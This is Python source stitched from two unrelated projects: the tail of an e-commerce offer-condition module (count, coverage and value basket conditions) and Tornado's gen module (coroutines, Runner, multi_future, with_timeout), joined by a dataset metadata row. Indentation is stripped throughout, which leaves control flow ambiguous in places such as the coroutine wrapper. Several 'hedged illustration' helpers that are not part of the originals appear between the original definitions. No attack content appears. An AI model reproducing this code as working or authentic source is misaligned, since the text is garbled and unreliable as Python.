Determines whether a given basket meets this condition
"""
num_matches = 0
for line in basket.all_lines():
if (self.can_apply_condition(line)
and line.quantity_without_discount > 0):
num_matches += line.quantity_without_discount
if num_matches >= self.value:
return True
return False
def _get_num_matches(self, basket):
if hasattr(self, '_num_matches'):
return getattr(self, '_num_matches')
num_matches = 0
for line in basket.all_lines():
if (self.can_apply_condition(line)
and line.quantity_without_discount > 0):
num_matches += line.quantity_without_discount
self._num_matches = num_matches
return num_matches
def is_partially_satisfied(self, offer, basket):
num_matches = self._get_num_matches(basket)
return 0 < num_matches < self.value
def get_upsell_message(self, offer, basket):
num_matches = self._get_num_matches(basket)
delta = self.value - num_matches
return ungettext('Buy %(delta)d more product from %(range)s',
'Buy %(delta)d more products from %(range)s', delta) \
% {'delta': delta, 'range': self.range}
def consume_items(self, offer, basket, affected_lines):
"""
Marks items within the basket lines as consumed so they
can't be reused in other offers.
:basket: The basket
:affected_lines: The lines that have been affected by the discount.
This should be list of tuples (line, discount, qty)
"""
# We need to count how many items have already been consumed as part of
# applying the benefit, so we don't consume too many items.
num_consumed = 0
for line, __, quantity in affected_lines:
num_consumed += quantity
to_consume = max(0, self.value - num_consumed)
if to_consume == 0:
return
for __, line in self.get_applicable_lines(offer, basket,
most_expensive_first=True):
quantity_to_consume = min(line.quantity_without_discount,
to_consume)
line.consume(quantity_to_consume)
to_consume -= quantity_to_consume
if to_consume == 0:
break
class CoverageCondition(Condition):
"""
An offer condition dependent on the number of DISTINCT matching items from
the basket.
"""
_description = _("Basket includes %(count)d distinct item(s) from"
" %(range)s")
@property
def name(self):
return self._description % {
'count': self.value,
'range': six.text_type(self.range).lower()}
@property
def description(self):
return self._description % {
'count': self.value,
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Coverage Condition")
verbose_name_plural = _("Coverage Conditions")
def is_satisfied(self, offer, basket):
"""
Determines whether a given basket meets this condition
"""
covered_ids = []
for line in basket.all_lines():
if not line.is_available_for_discount:
continue
product = line.product
if (self.can_apply_condition(line) and product.id not in
covered_ids):
covered_ids.append(product.id)
if len(covered_ids) >= self.value:
return True
return False
def _get_num_covered_products(self, basket):
covered_ids = []
for line in basket.all_lines():
if not line.is_available_for_discount:
continue
product = line.product
if (self.can_apply_condition(line) and product.id not in
covered_ids):
covered_ids.append(product.id)
return len(covered_ids)
def get_upsell_message(self, offer, basket):
delta = self.value - self._get_num_covered_products(basket)
return ungettext('Buy %(delta)d more product from %(range)s',
'Buy %(delta)d more products from %(range)s', delta) \
% {'delta': delta, 'range': self.range}
def is_partially_satisfied(self, offer, basket):
return 0 < self._get_num_covered_products(basket) < self.value
def consume_items(self, offer, basket, affected_lines):
"""
Marks items within the basket lines as consumed so they
can't be reused in other offers.
"""
# Determine products that have already been consumed by applying the
# benefit
consumed_products = []
for line, __, quantity in affected_lines:
consumed_products.append(line.product)
to_consume = max(0, self.value - len(consumed_products))
if to_consume == 0:
return
for line in basket.all_lines():
product = line.product
if not self.can_apply_condition(line):
continue
if product in consumed_products:
continue
if not line.is_available_for_discount:
continue
# Only consume a quantity of 1 from each line
line.consume(1)
consumed_products.append(product)
to_consume -= 1
if to_consume == 0:
break
def get_value_of_satisfying_items(self, offer, basket):
covered_ids = []
value = D('0.00')
for line in basket.all_lines():
if (self.can_apply_condition(line) and line.product.id not in
covered_ids):
covered_ids.append(line.product.id)
value += utils.unit_price(offer, line)
if len(covered_ids) >= self.value:
return value
return value
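# Hedged illustration (not part of the original module): coverage counts
# DISTINCT products, so several units of one product fill only one "slot".
# A stand-alone sketch over hypothetical product ids:
def _distinct_coverage(product_ids, target):
    seen = set()
    for product_id in product_ids:
        seen.add(product_id)
        if len(seen) >= target:
            return True
    return False
# e.g. _distinct_coverage([1, 1, 1, 2], 3) is False: ids 1 and 2 cover 2 slots.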
class ValueCondition(Condition):
"""
An offer condition dependent on the VALUE of matching items from the
basket.
"""
_description = _("Basket includes %(amount)s from %(range)s")
@property
def name(self):
return self._description % {
'amount': currency(self.value),
'range': six.text_type(self.range).lower()}
@property
def description(self):
return self._description % {
'amount': currency(self.value),
'range': utils.range_anchor(self.range)}
class Meta:
app_label = 'offer'
proxy = True
verbose_name = _("Value condition")
verbose_name_plural = _("Value conditions")
def is_satisfied(self, offer, basket):
"""
Determine whether a given basket meets this condition
"""
value_of_matches = D('0.00')
for line in basket.all_lines():
if (self.can_apply_condition(line) and
line.quantity_without_discount > 0):
price = utils.unit_price(offer, line)
value_of_matches += price * int(line.quantity_without_discount)
if value_of_matches >= self.value:
return True
return False
def _get_value_of_matches(self, offer, basket):
if hasattr(self, '_value_of_matches'):
return getattr(self, '_value_of_matches')
value_of_matches = D('0.00')
for line in basket.all_lines():
if (self.can_apply_condition(line) and
line.quantity_without_discount > 0):
price = utils.unit_price(offer, line)
value_of_matches += price * int(line.quantity_without_discount)
self._value_of_matches = value_of_matches
return value_of_matches
def is_partially_satisfied(self, offer, basket):
value_of_matches = self._get_value_of_matches(offer, basket)
return D('0.00') < value_of_matches < self.value
def get_upsell_message(self, offer, basket):
value_of_matches = self._get_value_of_matches(offer, basket)
return _('Spend %(value)s more from %(range)s') % {
'value': currency(self.value - value_of_matches),
'range': self.range}
def consume_items(self, offer, basket, affected_lines):
"""
Marks items within the basket lines as consumed so they
can't be reused in other offers.
We allow lines to be passed in as sometimes we want them sorted
in a specific order.
"""
# Determine value of items already consumed as part of discount
value_consumed = D('0.00')
for line, __, qty in affected_lines:
price = utils.unit_price(offer, line)
value_consumed += price * qty
to_consume = max(0, self.value - value_consumed)
if to_consume == 0:
return
for price, line in self.get_applicable_lines(
offer, basket, most_expensive_first=True):
quantity_to_consume = min(
line.quantity_without_discount,
(to_consume / price).quantize(D(1), ROUND_UP))
line.consume(quantity_to_consume)
to_consume -= price * quantity_to_consume
if to_consume <= 0:
break
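# Hedged note (not part of the original module): the ROUND_UP quantize above
# consumes enough whole units to cover the remaining value; covering 7.50 of
# value at 2.00 per unit takes 4 units, not 3.
def _units_needed(value, unit_price):
    return (value / unit_price).quantize(D(1), ROUND_UP)
# _units_needed(D('7.50'), D('2.00')) == D('4')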
| bsd-3-clause |
Acidburn0zzz/tornado | tornado/gen.py | 30 | 39041 | """``tornado.gen`` is a generator-based interface to make it easier to
work in an asynchronous environment. Code using the ``gen`` module
is technically asynchronous, but it is written as a single generator
instead of a collection of separate functions.
For example, the following asynchronous handler:
.. testcode::
class AsyncHandler(RequestHandler):
@asynchronous
def get(self):
http_client = AsyncHTTPClient()
http_client.fetch("http://example.com",
callback=self.on_fetch)
def on_fetch(self, response):
do_something_with_response(response)
self.render("template.html")
.. testoutput::
:hide:
could be written with ``gen`` as:
.. testcode::
class GenAsyncHandler(RequestHandler):
@gen.coroutine
def get(self):
http_client = AsyncHTTPClient()
response = yield http_client.fetch("http://example.com")
do_something_with_response(response)
self.render("template.html")
.. testoutput::
:hide:
Most asynchronous functions in Tornado return a `.Future`;
yielding this object returns its `~.Future.result`.
You can also yield a list or dict of ``Futures``, which will be
started at the same time and run in parallel; a list or dict of results will
be returned when they are all finished:
.. testcode::
@gen.coroutine
def get(self):
http_client = AsyncHTTPClient()
response1, response2 = yield [http_client.fetch(url1),
http_client.fetch(url2)]
response_dict = yield dict(response3=http_client.fetch(url3),
response4=http_client.fetch(url4))
response3 = response_dict['response3']
response4 = response_dict['response4']
.. testoutput::
:hide:
If the `~functools.singledispatch` library is available (standard in
Python 3.4, available via the `singledispatch
<https://pypi.python.org/pypi/singledispatch>`_ package on older
versions), additional types of objects may be yielded. Tornado includes
support for ``asyncio.Future`` and Twisted's ``Deferred`` class when
``tornado.platform.asyncio`` and ``tornado.platform.twisted`` are imported.
See the `convert_yielded` function to extend this mechanism.
.. versionchanged:: 3.2
Dict support added.
.. versionchanged:: 4.1
Support added for yielding ``asyncio`` Futures and Twisted Deferreds
via ``singledispatch``.
"""
from __future__ import absolute_import, division, print_function, with_statement
import collections
import functools
import itertools
import sys
import textwrap
import types
from tornado.concurrent import Future, TracebackFuture, is_future, chain_future
from tornado.ioloop import IOLoop
from tornado.log import app_log
from tornado import stack_context
from tornado.util import raise_exc_info
try:
from functools import singledispatch # py34+
except ImportError as e:
try:
from singledispatch import singledispatch # backport
except ImportError:
singledispatch = None
try:
from collections.abc import Generator as GeneratorType # py35+
except ImportError:
from types import GeneratorType
try:
from inspect import isawaitable # py35+
except ImportError:
def isawaitable(x): return False
try:
import builtins # py3
except ImportError:
import __builtin__ as builtins
class KeyReuseError(Exception):
pass
class UnknownKeyError(Exception):
pass
class LeakedCallbackError(Exception):
pass
class BadYieldError(Exception):
pass
class ReturnValueIgnoredError(Exception):
pass
class TimeoutError(Exception):
"""Exception raised by ``with_timeout``."""
def engine(func):
"""Callback-oriented decorator for asynchronous generators.
This is an older interface; for new code that does not need to be
compatible with versions of Tornado older than 3.0 the
`coroutine` decorator is recommended instead.
This decorator is similar to `coroutine`, except it does not
return a `.Future` and the ``callback`` argument is not treated
specially.
In most cases, functions decorated with `engine` should take
a ``callback`` argument and invoke it with their result when
they are finished. One notable exception is the
`~tornado.web.RequestHandler` :ref:`HTTP verb methods <verbs>`,
which use ``self.finish()`` in place of a callback argument.
"""
func = _make_coroutine_wrapper(func, replace_callback=False)
@functools.wraps(func)
def wrapper(*args, **kwargs):
future = func(*args, **kwargs)
def final_callback(future):
if future.result() is not None:
raise ReturnValueIgnoredError(
"@gen.engine functions cannot return values: %r" %
(future.result(),))
# The engine interface doesn't give us any way to return
# errors but to raise them into the stack context.
# Save the stack context here to use when the Future has resolved.
future.add_done_callback(stack_context.wrap(final_callback))
return wrapper
def coroutine(func, replace_callback=True):
"""Decorator for asynchronous generators.
Any generator that yields objects from this module must be wrapped
in either this decorator or `engine`.
Coroutines may "return" by raising the special exception
`Return(value) <Return>`. In Python 3.3+, it is also possible for
the function to simply use the ``return value`` statement (prior to
Python 3.3 generators were not allowed to also return values).
In all versions of Python a coroutine that simply wishes to exit
early may use the ``return`` statement without a value.
Functions with this decorator return a `.Future`. Additionally,
they may be called with a ``callback`` keyword argument, which
will be invoked with the future's result when it resolves. If the
coroutine fails, the callback will not be run and an exception
will be raised into the surrounding `.StackContext`. The
``callback`` argument is not visible inside the decorated
function; it is handled by the decorator itself.
From the caller's perspective, ``@gen.coroutine`` is similar to
the combination of ``@return_future`` and ``@gen.engine``.
.. warning::
When exceptions occur inside a coroutine, the exception
information will be stored in the `.Future` object. You must
examine the result of the `.Future` object, or the exception
may go unnoticed by your code. This means yielding the function
if called from another coroutine, using something like
`.IOLoop.run_sync` for top-level calls, or passing the `.Future`
to `.IOLoop.add_future`.
"""
return _make_coroutine_wrapper(func, replace_callback=True)
def _make_coroutine_wrapper(func, replace_callback):
"""The inner workings of ``@gen.coroutine`` and ``@gen.engine``.
The two decorators differ in their treatment of the ``callback``
argument, so we cannot simply implement ``@engine`` in terms of
``@coroutine``.
"""
# On Python 3.5, set the coroutine flag on our generator, to allow it
# to be used with 'await'.
if hasattr(types, 'coroutine'):
func = types.coroutine(func)
@functools.wraps(func)
def wrapper(*args, **kwargs):
future = TracebackFuture()
if replace_callback and 'callback' in kwargs:
callback = kwargs.pop('callback')
IOLoop.current().add_future(
future, lambda future: callback(future.result()))
try:
result = func(*args, **kwargs)
except (Return, StopIteration) as e:
result = getattr(e, 'value', None)
except Exception:
future.set_exc_info(sys.exc_info())
return future
else:
if isinstance(result, GeneratorType):
# Inline the first iteration of Runner.run. This lets us
# avoid the cost of creating a Runner when the coroutine
# never actually yields, which in turn allows us to
# use "optional" coroutines in critical path code without
# performance penalty for the synchronous case.
try:
orig_stack_contexts = stack_context._state.contexts
yielded = next(result)
if stack_context._state.contexts is not orig_stack_contexts:
yielded = TracebackFuture()
yielded.set_exception(
stack_context.StackContextInconsistentError(
'stack_context inconsistency (probably caused '
'by yield within a "with StackContext" block)'))
except (StopIteration, Return) as e:
future.set_result(getattr(e, 'value', None))
except Exception:
future.set_exc_info(sys.exc_info())
else:
Runner(result, future, yielded)
try:
return future
finally:
# Subtle memory optimization: if next() raised an exception,
# the future's exc_info contains a traceback which
# includes this stack frame. This creates a cycle,
# which will be collected at the next full GC but has
# been shown to greatly increase memory usage of
# benchmarks (relative to the refcount-based scheme
# used in the absence of cycles). We can avoid the
# cycle by clearing the local variable after we return it.
future = None
future.set_result(result)
return future
return wrapper
class Return(Exception):
"""Special exception to return a value from a `coroutine`.
If this exception is raised, its value argument is used as the
result of the coroutine::
@gen.coroutine
def fetch_json(url):
response = yield AsyncHTTPClient().fetch(url)
raise gen.Return(json_decode(response.body))
In Python 3.3, this exception is no longer necessary: the ``return``
statement can be used directly to return a value (previously
``yield`` and ``return`` with a value could not be combined in the
same function).
By analogy with the return statement, the value argument is optional,
but it is never necessary to ``raise gen.Return()``. The ``return``
statement can be used with no arguments instead.
"""
def __init__(self, value=None):
super(Return, self).__init__()
self.value = value
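# Hedged usage sketch (not part of the original module): a minimal coroutine
# that "returns" via Return without ever yielding (the decorator explicitly
# supports this "optional coroutine" case). `_example_add` is a hypothetical
# name; IOLoop.current().run_sync(lambda: _example_add(1, 2)) would yield 3.
@coroutine
def _example_add(x, y):
    raise Return(x + y)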
class WaitIterator(object):
"""Provides an iterator to yield the results of futures as they finish.
Yielding a set of futures like this:
``results = yield [future1, future2]``
pauses the coroutine until both ``future1`` and ``future2``
return, and then restarts the coroutine with the results of both
futures. If either future is an exception, the expression will
raise that exception and all the results will be lost.
If you need to get the result of each future as soon as possible,
or if you need the result of some futures even if others produce
errors, you can use ``WaitIterator``::
wait_iterator = gen.WaitIterator(future1, future2)
while not wait_iterator.done():
try:
result = yield wait_iterator.next()
except Exception as e:
print("Error {} from {}".format(e, wait_iterator.current_future))
else:
print("Result {} received from {} at {}".format(
result, wait_iterator.current_future,
wait_iterator.current_index))
Because results are returned as soon as they are available the
output from the iterator *will not be in the same order as the
input arguments*. If you need to know which future produced the
current result, you can use the attributes
``WaitIterator.current_future``, or ``WaitIterator.current_index``
to get the index of the future from the input list. (if keyword
arguments were used in the construction of the `WaitIterator`,
``current_index`` will use the corresponding keyword).
On Python 3.5, `WaitIterator` implements the async iterator
protocol, so it can be used with the ``async for`` statement (note
that in this version the entire iteration is aborted if any value
raises an exception, while the previous example can continue past
individual errors)::
async for result in gen.WaitIterator(future1, future2):
print("Result {} received from {} at {}".format(
result, wait_iterator.current_future,
wait_iterator.current_index))
.. versionadded:: 4.1
.. versionchanged:: 4.3
Added ``async for`` support in Python 3.5.
"""
def __init__(self, *args, **kwargs):
if args and kwargs:
raise ValueError(
"You must provide args or kwargs, not both")
if kwargs:
self._unfinished = dict((f, k) for (k, f) in kwargs.items())
futures = list(kwargs.values())
else:
self._unfinished = dict((f, i) for (i, f) in enumerate(args))
futures = args
self._finished = collections.deque()
self.current_index = self.current_future = None
self._running_future = None
for future in futures:
future.add_done_callback(self._done_callback)
def done(self):
"""Returns True if this iterator has no more results."""
if self._finished or self._unfinished:
return False
# Clear the 'current' values when iteration is done.
self.current_index = self.current_future = None
return True
def next(self):
"""Returns a `.Future` that will yield the next available result.
Note that this `.Future` will not be the same object as any of
the inputs.
"""
self._running_future = TracebackFuture()
if self._finished:
self._return_result(self._finished.popleft())
return self._running_future
def _done_callback(self, done):
if self._running_future and not self._running_future.done():
self._return_result(done)
else:
self._finished.append(done)
def _return_result(self, done):
"""Called set the returned future's state that of the future
we yielded, and set the current future for the iterator.
"""
chain_future(done, self._running_future)
self.current_future = done
self.current_index = self._unfinished.pop(done)
@coroutine
def __aiter__(self):
raise Return(self)
def __anext__(self):
if self.done():
# Lookup by name to silence pyflakes on older versions.
raise getattr(builtins, 'StopAsyncIteration')()
return self.next()
class YieldPoint(object):
"""Base class for objects that may be yielded from the generator.
.. deprecated:: 4.0
Use `Futures <.Future>` instead.
"""
def start(self, runner):
"""Called by the runner after the generator has yielded.
No other methods will be called on this object before ``start``.
"""
raise NotImplementedError()
def is_ready(self):
"""Called by the runner to determine whether to resume the generator.
Returns a boolean; may be called more than once.
"""
raise NotImplementedError()
def get_result(self):
"""Returns the value to use as the result of the yield expression.
This method will only be called once, and only after `is_ready`
has returned true.
"""
raise NotImplementedError()
class Callback(YieldPoint):
"""Returns a callable object that will allow a matching `Wait` to proceed.
The key may be any value suitable for use as a dictionary key, and is
used to match ``Callbacks`` to their corresponding ``Waits``. The key
must be unique among outstanding callbacks within a single run of the
generator function, but may be reused across different runs of the same
function (so constants generally work fine).
The callback may be called with zero or one arguments; if an argument
is given it will be returned by `Wait`.
.. deprecated:: 4.0
Use `Futures <.Future>` instead.
"""
def __init__(self, key):
self.key = key
def start(self, runner):
self.runner = runner
runner.register_callback(self.key)
def is_ready(self):
return True
def get_result(self):
return self.runner.result_callback(self.key)
class Wait(YieldPoint):
"""Returns the argument passed to the result of a previous `Callback`.
.. deprecated:: 4.0
Use `Futures <.Future>` instead.
"""
def __init__(self, key):
self.key = key
def start(self, runner):
self.runner = runner
def is_ready(self):
return self.runner.is_ready(self.key)
def get_result(self):
return self.runner.pop_result(self.key)
class WaitAll(YieldPoint):
"""Returns the results of multiple previous `Callbacks <Callback>`.
The argument is a sequence of `Callback` keys, and the result is
a list of results in the same order.
`WaitAll` is equivalent to yielding a list of `Wait` objects.
.. deprecated:: 4.0
Use `Futures <.Future>` instead.
"""
def __init__(self, keys):
self.keys = keys
def start(self, runner):
self.runner = runner
def is_ready(self):
return all(self.runner.is_ready(key) for key in self.keys)
def get_result(self):
return [self.runner.pop_result(key) for key in self.keys]
def Task(func, *args, **kwargs):
"""Adapts a callback-based asynchronous function for use in coroutines.
Takes a function (and optional additional arguments) and runs it with
those arguments plus a ``callback`` keyword argument. The argument passed
to the callback is returned as the result of the yield expression.
.. versionchanged:: 4.0
``gen.Task`` is now a function that returns a `.Future`, instead of
a subclass of `YieldPoint`. It still behaves the same way when
yielded.
"""
future = Future()
def handle_exception(typ, value, tb):
if future.done():
return False
future.set_exc_info((typ, value, tb))
return True
def set_result(result):
if future.done():
return
future.set_result(result)
with stack_context.ExceptionStackContext(handle_exception):
func(*args, callback=_argument_adapter(set_result), **kwargs)
return future
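# Hedged usage sketch (not part of the original module): adapting a
# hypothetical callback-style API so it can be yielded in a coroutine.
def _example_callback_api(x, callback):
    callback(x * 2)
# Inside a coroutine one could then write:
#     doubled = yield Task(_example_callback_api, 21)   # doubled == 42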
class YieldFuture(YieldPoint):
def __init__(self, future, io_loop=None):
"""Adapts a `.Future` to the `YieldPoint` interface.
.. versionchanged:: 4.1
The ``io_loop`` argument is deprecated.
"""
self.future = future
self.io_loop = io_loop or IOLoop.current()
def start(self, runner):
if not self.future.done():
self.runner = runner
self.key = object()
runner.register_callback(self.key)
self.io_loop.add_future(self.future, runner.result_callback(self.key))
else:
self.runner = None
self.result_fn = self.future.result
def is_ready(self):
if self.runner is not None:
return self.runner.is_ready(self.key)
else:
return True
def get_result(self):
if self.runner is not None:
return self.runner.pop_result(self.key).result()
else:
return self.result_fn()
class Multi(YieldPoint):
"""Runs multiple asynchronous operations in parallel.
Takes a list of ``YieldPoints`` or ``Futures`` and returns a list of
their responses. It is not necessary to call `Multi` explicitly,
since the engine will do so automatically when the generator yields
a list of ``YieldPoints`` or a mixture of ``YieldPoints`` and ``Futures``.
Instead of a list, the argument may also be a dictionary whose values are
Futures, in which case a parallel dictionary is returned mapping the same
keys to their results.
It is not normally necessary to call this class directly, as it
will be created automatically as needed. However, calling it directly
allows you to use the ``quiet_exceptions`` argument to control
the logging of multiple exceptions.
.. versionchanged:: 4.2
If multiple ``YieldPoints`` fail, any exceptions after the first
(which is raised) will be logged. Added the ``quiet_exceptions``
argument to suppress this logging for selected exception types.
"""
def __init__(self, children, quiet_exceptions=()):
self.keys = None
if isinstance(children, dict):
self.keys = list(children.keys())
children = children.values()
self.children = []
for i in children:
if is_future(i):
i = YieldFuture(i)
self.children.append(i)
assert all(isinstance(i, YieldPoint) for i in self.children)
self.unfinished_children = set(self.children)
self.quiet_exceptions = quiet_exceptions
def start(self, runner):
for i in self.children:
i.start(runner)
def is_ready(self):
finished = list(itertools.takewhile(
lambda i: i.is_ready(), self.unfinished_children))
self.unfinished_children.difference_update(finished)
return not self.unfinished_children
def get_result(self):
result_list = []
exc_info = None
for f in self.children:
try:
result_list.append(f.get_result())
except Exception as e:
if exc_info is None:
exc_info = sys.exc_info()
else:
if not isinstance(e, self.quiet_exceptions):
app_log.error("Multiple exceptions in yield list",
exc_info=True)
if exc_info is not None:
raise_exc_info(exc_info)
if self.keys is not None:
return dict(zip(self.keys, result_list))
else:
return list(result_list)
def multi_future(children, quiet_exceptions=()):
"""Wait for multiple asynchronous futures in parallel.
Takes a list of ``Futures`` or other yieldable objects (with the
exception of the legacy `.YieldPoint` interfaces) and returns a
new Future that resolves when all the other Futures are done. If
all the ``Futures`` succeeded, the returned Future's result is a
list of their results. If any failed, the returned Future raises
the exception of the first one to fail.
Instead of a list, the argument may also be a dictionary whose values are
Futures, in which case a parallel dictionary is returned mapping the same
keys to their results.
It is not normally necessary to call `multi_future` explicitly,
since the engine will do so automatically when the generator
yields a list of ``Futures``. However, calling it directly
allows you to use the ``quiet_exceptions`` argument to control
the logging of multiple exceptions.
This function is faster than the `Multi` `YieldPoint` because it
does not require the creation of a stack context.
.. versionadded:: 4.0
.. versionchanged:: 4.2
If multiple ``Futures`` fail, any exceptions after the first (which is
raised) will be logged. Added the ``quiet_exceptions``
argument to suppress this logging for selected exception types.
.. versionchanged:: 4.3
Added support for other yieldable objects.
"""
if isinstance(children, dict):
keys = list(children.keys())
children = children.values()
else:
keys = None
children = list(map(convert_yielded, children))
assert all(is_future(i) for i in children)
unfinished_children = set(children)
future = Future()
if not children:
future.set_result({} if keys is not None else [])
def callback(f):
unfinished_children.remove(f)
if not unfinished_children:
result_list = []
for f in children:
try:
result_list.append(f.result())
except Exception as e:
if future.done():
if not isinstance(e, quiet_exceptions):
app_log.error("Multiple exceptions in yield list",
exc_info=True)
else:
future.set_exc_info(sys.exc_info())
if not future.done():
if keys is not None:
future.set_result(dict(zip(keys, result_list)))
else:
future.set_result(result_list)
listening = set()
for f in children:
if f not in listening:
listening.add(f)
f.add_done_callback(callback)
return future
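# Hedged illustration (not part of the original module): combining two
# already-resolved Futures; the combined Future's result is a list.
def _example_multi_future():
    f1, f2 = Future(), Future()
    f1.set_result(1)
    f2.set_result(2)
    return multi_future([f1, f2])  # a Future resolving to [1, 2]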
def maybe_future(x):
"""Converts ``x`` into a `.Future`.
If ``x`` is already a `.Future`, it is simply returned; otherwise
it is wrapped in a new `.Future`. This is suitable for use as
``result = yield gen.maybe_future(f())`` when you don't know whether
``f()`` returns a `.Future` or not.
"""
if is_future(x):
return x
else:
fut = Future()
fut.set_result(x)
return fut
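# Hedged illustration (not part of the original module): plain values and
# Futures both normalize to a Future.
def _example_maybe_future():
    assert maybe_future(42).result() == 42
    f = Future()
    assert maybe_future(f) is f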
def with_timeout(timeout, future, io_loop=None, quiet_exceptions=()):
"""Wraps a `.Future` in a timeout.
Raises `TimeoutError` if the input future does not complete before
``timeout``, which may be specified in any form allowed by
`.IOLoop.add_timeout` (i.e. a `datetime.timedelta` or an absolute time
relative to `.IOLoop.time`)
If the wrapped `.Future` fails after it has timed out, the exception
will be logged unless it is of a type contained in ``quiet_exceptions``
(which may be an exception type or a sequence of types).
Currently only supports Futures, not other `YieldPoint` classes.
.. versionadded:: 4.0
.. versionchanged:: 4.1
Added the ``quiet_exceptions`` argument and the logging of unhandled
exceptions.
"""
# TODO: allow yield points in addition to futures?
# Tricky to do with stack_context semantics.
#
# It's tempting to optimize this by cancelling the input future on timeout
# instead of creating a new one, but A) we can't know if we are the only
# one waiting on the input future, so cancelling it might disrupt other
# callers and B) concurrent futures can only be cancelled while they are
# in the queue, so cancellation cannot reliably bound our waiting time.
result = Future()
chain_future(future, result)
if io_loop is None:
io_loop = IOLoop.current()
def error_callback(future):
try:
future.result()
except Exception as e:
if not isinstance(e, quiet_exceptions):
app_log.error("Exception in Future %r after timeout",
future, exc_info=True)
def timeout_callback():
result.set_exception(TimeoutError("Timeout"))
# In case the wrapped future goes on to fail, log it.
future.add_done_callback(error_callback)
timeout_handle = io_loop.add_timeout(
timeout, timeout_callback)
if isinstance(future, Future):
# We know this future will resolve on the IOLoop, so we don't
# need the extra thread-safety of IOLoop.add_future (and we also
# don't care about StackContext here).
future.add_done_callback(
lambda future: io_loop.remove_timeout(timeout_handle))
else:
# concurrent.futures.Futures may resolve on any thread, so we
# need to route them back to the IOLoop.
io_loop.add_future(
future, lambda future: io_loop.remove_timeout(timeout_handle))
return result
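# Hedged usage sketch (not part of the original module): wrapping a Future
# that never resolves, so the timeout path fires. With an IOLoop running,
# the returned Future fails with TimeoutError after one second.
def _example_with_timeout():
    import datetime
    return with_timeout(datetime.timedelta(seconds=1), Future())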
def sleep(duration):
"""Return a `.Future` that resolves after the given number of seconds.
When used with ``yield`` in a coroutine, this is a non-blocking
analogue to `time.sleep` (which should not be used in coroutines
because it is blocking)::
yield gen.sleep(0.5)
Note that calling this function on its own does nothing; you must
wait on the `.Future` it returns (usually by yielding it).
.. versionadded:: 4.1
"""
f = Future()
IOLoop.current().call_later(duration, lambda: f.set_result(None))
return f
_null_future = Future()
_null_future.set_result(None)
moment = Future()
moment.__doc__ = \
"""A special object which may be yielded to allow the IOLoop to run for
one iteration.
This is not needed in normal use but it can be helpful in long-running
coroutines that are likely to yield Futures that are ready instantly.
Usage: ``yield gen.moment``
.. versionadded:: 4.0
"""
moment.set_result(None)
class Runner(object):
"""Internal implementation of `tornado.gen.engine`.
Maintains information about pending callbacks and their results.
The results of the generator are stored in ``result_future`` (a
`.TracebackFuture`)
"""
def __init__(self, gen, result_future, first_yielded):
self.gen = gen
self.result_future = result_future
self.future = _null_future
self.yield_point = None
self.pending_callbacks = None
self.results = None
self.running = False
self.finished = False
self.had_exception = False
self.io_loop = IOLoop.current()
# For efficiency, we do not create a stack context until we
# reach a YieldPoint (stack contexts are required for the historical
# semantics of YieldPoints, but not for Futures). When we have
# done so, this field will be set and must be called at the end
# of the coroutine.
self.stack_context_deactivate = None
if self.handle_yield(first_yielded):
self.run()
def register_callback(self, key):
"""Adds ``key`` to the list of callbacks."""
if self.pending_callbacks is None:
# Lazily initialize the old-style YieldPoint data structures.
self.pending_callbacks = set()
self.results = {}
if key in self.pending_callbacks:
raise KeyReuseError("key %r is already pending" % (key,))
self.pending_callbacks.add(key)
def is_ready(self, key):
"""Returns true if a result is available for ``key``."""
if self.pending_callbacks is None or key not in self.pending_callbacks:
raise UnknownKeyError("key %r is not pending" % (key,))
return key in self.results
def set_result(self, key, result):
"""Sets the result for ``key`` and attempts to resume the generator."""
self.results[key] = result
if self.yield_point is not None and self.yield_point.is_ready():
try:
self.future.set_result(self.yield_point.get_result())
except:
self.future.set_exc_info(sys.exc_info())
self.yield_point = None
self.run()
def pop_result(self, key):
"""Returns the result for ``key`` and unregisters it."""
self.pending_callbacks.remove(key)
return self.results.pop(key)
def run(self):
"""Starts or resumes the generator, running until it reaches a
yield point that is not ready.
"""
if self.running or self.finished:
return
try:
self.running = True
while True:
future = self.future
if not future.done():
return
self.future = None
try:
orig_stack_contexts = stack_context._state.contexts
exc_info = None
try:
value = future.result()
except Exception:
self.had_exception = True
exc_info = sys.exc_info()
if exc_info is not None:
yielded = self.gen.throw(*exc_info)
exc_info = None
else:
yielded = self.gen.send(value)
if stack_context._state.contexts is not orig_stack_contexts:
self.gen.throw(
stack_context.StackContextInconsistentError(
'stack_context inconsistency (probably caused '
'by yield within a "with StackContext" block)'))
except (StopIteration, Return) as e:
self.finished = True
self.future = _null_future
if self.pending_callbacks and not self.had_exception:
# If we ran cleanly without waiting on all callbacks
# raise an error (really more of a warning). If we
# had an exception then some callbacks may have been
# orphaned, so skip the check in that case.
raise LeakedCallbackError(
"finished without waiting for callbacks %r" %
self.pending_callbacks)
self.result_future.set_result(getattr(e, 'value', None))
self.result_future = None
self._deactivate_stack_context()
return
except Exception:
self.finished = True
self.future = _null_future
self.result_future.set_exc_info(sys.exc_info())
self.result_future = None
self._deactivate_stack_context()
return
if not self.handle_yield(yielded):
return
finally:
self.running = False
def handle_yield(self, yielded):
# Lists containing YieldPoints require stack contexts;
# other lists are handled via multi_future in convert_yielded.
if (isinstance(yielded, list) and
any(isinstance(f, YieldPoint) for f in yielded)):
yielded = Multi(yielded)
elif (isinstance(yielded, dict) and
any(isinstance(f, YieldPoint) for f in yielded.values())):
yielded = Multi(yielded)
if isinstance(yielded, YieldPoint):
# YieldPoints are too closely coupled to the Runner to go
# through the generic convert_yielded mechanism.
self.future = TracebackFuture()
def start_yield_point():
try:
yielded.start(self)
if yielded.is_ready():
self.future.set_result(
yielded.get_result())
else:
self.yield_point = yielded
except Exception:
self.future = TracebackFuture()
self.future.set_exc_info(sys.exc_info())
if self.stack_context_deactivate is None:
# Start a stack context if this is the first
# YieldPoint we've seen.
with stack_context.ExceptionStackContext(
self.handle_exception) as deactivate:
self.stack_context_deactivate = deactivate
def cb():
start_yield_point()
self.run()
self.io_loop.add_callback(cb)
return False
else:
start_yield_point()
else:
try:
self.future = convert_yielded(yielded)
except BadYieldError:
self.future = TracebackFuture()
self.future.set_exc_info(sys.exc_info())
if not self.future.done() or self.future is moment:
self.io_loop.add_future(
self.future, lambda f: self.run())
return False
return True
def result_callback(self, key):
return stack_context.wrap(_argument_adapter(
functools.partial(self.set_result, key)))
def handle_exception(self, typ, value, tb):
if not self.running and not self.finished:
self.future = TracebackFuture()
self.future.set_exc_info((typ, value, tb))
self.run()
return True
else:
return False
def _deactivate_stack_context(self):
if self.stack_context_deactivate is not None:
self.stack_context_deactivate()
self.stack_context_deactivate = None
